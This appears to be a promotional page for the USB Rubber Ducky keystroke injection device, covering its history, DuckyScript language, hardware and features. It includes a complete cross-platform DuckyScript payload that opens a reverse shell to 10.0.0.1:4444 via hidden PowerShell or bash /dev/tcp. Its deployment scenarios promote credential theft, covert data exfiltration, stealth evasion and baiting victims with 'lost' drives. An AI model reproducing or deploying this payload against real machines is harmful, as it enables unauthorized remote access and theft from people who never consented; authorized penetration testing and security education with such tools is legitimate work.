πŸ¦†

Rubber Ducky

The Original Keystroke Injection Tool

The device that invented the keystroke injection attack. Looks like a flash drive, types like a keyboard, executes payloads at over 1000 words per minute. A hacker culture icon since 2010.

KEYSTROKE INJECTION DUCKYSCRIPTβ„’ 3.0 USB-C + USB-A HID EMULATION MICROSD CROSS-PLATFORM
// Overview
Computers Trust Keyboards. Period.

Every computer inherently trusts USB Human Interface Devices. A keyboard says "I'm a keyboard" and the OS accepts it β€” no drivers, no prompts, no questions. The USB Rubber Ducky exploits this universal trust by presenting itself as a trusted keyboard while executing pre-programmed payloads at superhuman speeds. From credential theft to reverse shells, if you can type it, the Ducky can do it β€” but in seconds, not minutes.

πŸ‘€
Humans
use keyboards
TRUST β†’
⌨️
Keyboards
HID standard
TRUST β†’
πŸ’»
Computers
auto-accept HID
EXPLOIT ←
πŸ¦†
Rubber Ducky
looks like a flash drive
1000+
WORDS / MINUTE
The Rubber Ducky types faster than any human. A payload that would take a person several minutes to type manually is executed in seconds β€” far too fast for anyone to react or intervene.
// Legacy
A Hacker Culture Icon
2010
Invention
Darren Kitchen creates keystroke injection at his IT job
2011
Mark I
First USB Rubber Ducky with DuckyScript 1.0
2017
Ecosystem
DuckyScript adopted by Bash Bunny, Key Croc, O.MG
2022
Mark II
USB-C/A, DuckyScript 3.0, Keystroke Reflection
// Language
DuckyScriptβ„’ 3.0 Advanced

What started as three simple commands evolved into a full structured programming language β€” while staying simple enough to learn in minutes.

V1.0 β€” 2010
Classic
Three commands: type, delay, keystroke. Simple macro language. Write a text file, encode, deploy.
V2.0 β€” 2020
Extended
MATCH patterns, SAVEKEYS, multi-device support. Interpreted execution on Key Croc.
V3.0 β€” 2022
Advanced
Variables, if/then, while loops, functions, randomization, extensions, OS detection, Keystroke Reflection.
// Hardware
Specifications
πŸ”—
USB Interface
USB-C and USB-A connectors
Desktop, laptop & mobile targets
πŸ’Ύ
Storage
MicroSD card slot
Stores payloads + exfiltrated loot
πŸŽ›οΈ
Controls
Recessed button for arming mode
LED status indicator
πŸ“
Form Factor
Standard flash drive case
Inconspicuous appearance
πŸ–₯️
Compatibility
Windows, macOS, Linux, Android
Any device with USB HID support
⚑
Attack Modes
HID (keyboard emulation)
HID + STORAGE combined
// Capabilities
Key Features
β–Έ
Keystroke Injection β€” The attack Hak5 invented. Inject pre-programmed keystrokes at superhuman speed as a trusted HID device. Works on locked and unlocked targets.
β–Έ
Keystroke Reflection β€” Revolutionary exfiltration pathway that evades endpoint restrictions, firewalls, and air-gaps. Data leaves through the keyboard channel itself.
β–Έ
OS Detection β€” Payloads can automatically detect the target operating system and branch to platform-specific attack code. One payload, all platforms.
β–Έ
Stealth Features β€” Mimic human typing cadence with randomized delays. File system spoofing hides loot and injection files. Detect storage activity to sense device inspection.
β–Έ
Payload Studio β€” Full-featured web-based IDE with syntax highlighting, auto-complete, live error checking, and payload repository integration. Build and encode entirely in-browser.
β–Έ
Extensions System β€” Reusable code blocks shared across payloads. The community contributes extensions that expand the language, abstracting complex tasks into simple calls.
β–Έ
Programmable Button β€” BUTTON_DEF lets payloads assign custom functions to the physical button. Toggle between attack and arming modes, trigger multi-stage payloads, or abort.
β–Έ
Hundreds of Payloads β€” Community-maintained Git repository with credential grabbers, reverse shells, exfiltration tools, pranks, and more. Backwards compatible with classic scripts.
// Payload Example
Cross-Platform Reverse Shell

This DuckyScript 3.0 payload detects the target OS and launches the appropriate reverse shell β€” one payload for all platforms.

REM Cross-Platform Reverse Shell
REM Detects OS and adapts automatically

ATTACKMODE HID
DELAY 2000

REM Detect target OS
IF $_OS == WINDOWS THEN
  GUI r
  DELAY 500
  STRINGLN powershell -w hidden -ep bypass
  DELAY 1000
  STRINGLN $c=New-Object Net.Sockets.TCPClient('10.0.0.1',4444)
ELSE IF $_OS == MACOS THEN
  GUI SPACE
  DELAY 500
  STRINGLN Terminal
  DELAY 1000
  STRINGLN bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 &
ELSE
  CTRL ALT t
  DELAY 500
  STRINGLN bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 &
END_IF
// Use Cases
Deployment Scenarios
πŸ”
Credential Theft
Open a hidden terminal, dump credentials, and exfiltrate via Keystroke Reflection β€” all before the user can react.
πŸšͺ
Reverse Shells
Establish persistent remote access in seconds. OS detection ensures the right shell command runs on any platform.
🎭
Social Engineering
Drop a "lost" flash drive in a target's workspace. When plugged in, the payload executes automatically with zero interaction.
πŸ“€
Data Exfiltration
Use HID + STORAGE mode to silently copy target files to the Ducky's MicroSD while injecting cleanup commands.
πŸ€–
IT Automation
Where the Ducky began β€” automating printer configs, network shares, and system maintenance. Let the Ducky do the typing.
πŸŽ“
Education
DuckyScript has been a cybersecurity gateway for hundreds of thousands of learners. Simple enough to learn in minutes, deep enough for advanced research.